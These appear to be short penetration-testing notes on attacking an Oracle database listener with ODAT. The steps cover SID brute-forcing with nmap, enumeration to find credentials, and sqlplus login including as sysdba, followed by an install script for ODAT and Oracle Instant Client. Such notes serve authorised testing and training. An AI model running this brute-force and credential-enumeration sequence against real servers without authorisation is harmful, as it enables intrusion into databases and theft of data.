Step 1) We have installed odat.py in to kali machine, once we installed we can check if itis working fine.
  python3 odat.py -h 

Step 2) sudo nmap -p1521 -sV <IP address> --open --script oracle-sid-brute :- Brute force the SID, which is needed for connecting to the server.

Step 3) python3 odat.py all -s <IP address> :- To enumerate the server and we can give the credentials saved in the server.

Step 4) Once we have the credentials, we can connect to the server. 
        sqlplus <username>/<password>@<IP address>/SID

Step 4) We can also connect as other user. 
        sqlplus <username>/<password>@<IP Address>/SID as sysdba

==============================================================================================================================================
If it is not installed, we can run the below shell command to install odat.py
#!/bin/bash

sudo apt-get install libaio1 python3-dev alien -y
git clone https://github.com/quentinhardy/odat.git
cd odat/
git submodule init
git submodule update
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-basic-linux.x64-21.12.0.0.0dbru.zip
wget https://download.oracle.com/otn_software/linux/instantclient/2112000/instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
unzip instantclient-sqlplus-linux.x64-21.12.0.0.0dbru.zip
export LD_LIBRARY_PATH=instantclient_21_12:$LD_LIBRARY_PATH
export PATH=$LD_LIBRARY_PATH:$PATH
pip3 install cx_Oracle
sudo apt-get install python3-scapy -y
sudo pip3 install colorlog termcolor passlib python-libnmap
sudo apt-get install build-essential libgmp-dev -y
pip3 install pycryptodome

==============================================================================================================================================

If we have the an following error 
        "sqlplus: error while loading shared libraries: libsqlplus.so: cannot open shared object file: No such file or directory"

Run the below command in klai machine 
sudo sh -c "echo /usr/lib/oracle/12.2/client64/lib > /etc/ld.so.conf.d/oracle-instantclient.conf";sudo ldconfig




